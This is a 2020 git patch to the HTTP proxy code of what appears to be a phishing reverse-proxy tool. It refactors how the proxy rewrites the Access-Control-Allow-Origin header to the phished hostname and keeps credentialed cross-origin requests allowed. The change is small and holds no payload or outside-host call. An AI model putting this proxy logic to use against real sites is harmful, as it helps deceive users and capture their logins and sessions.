From 09e78a96b4613ed9e05855e66c89e53c99f399fe Mon Sep 17 00:00:00 2001
From: Kuba Gretzky <kuba@breakdev.org>
Date: Mon, 21 Sep 2020 16:17:19 +0200
Subject: [PATCH] small tweak to handle Access-Control-Allow-Origin header

---
 core/http_proxy.go | 15 ++++++---------
 1 file changed, 6 insertions(+), 9 deletions(-)

diff --git a/core/http_proxy.go b/core/http_proxy.go
index fd4a422..a1c6539 100644
--- a/core/http_proxy.go
+++ b/core/http_proxy.go
@@ -606,16 +606,13 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 			}
 
 			allow_origin := resp.Header.Get("Access-Control-Allow-Origin")
-			if allow_origin != "" {
-				if allow_origin != "*" {
-					if u, err := url.Parse(allow_origin); err == nil {
-						if o_host, ok := p.replaceHostWithPhished(u.Host); ok {
-							resp.Header.Set("Access-Control-Allow-Origin", u.Scheme+"://"+o_host)
-						}
-					} else {
-						log.Warning("can't parse URL from 'Access-Control-Allow-Origin' header: %s", allow_origin)
-						resp.Header.Set("Access-Control-Allow-Origin", "*")
+			if allow_origin != "" && allow_origin != "*" {
+				if u, err := url.Parse(allow_origin); err == nil {
+					if o_host, ok := p.replaceHostWithPhished(u.Host); ok {
+						resp.Header.Set("Access-Control-Allow-Origin", u.Scheme+"://"+o_host)
 					}
+				} else {
+					log.Warning("can't parse URL from 'Access-Control-Allow-Origin' header: %s", allow_origin)
 				}
 				resp.Header.Set("Access-Control-Allow-Credentials", "true")
 			}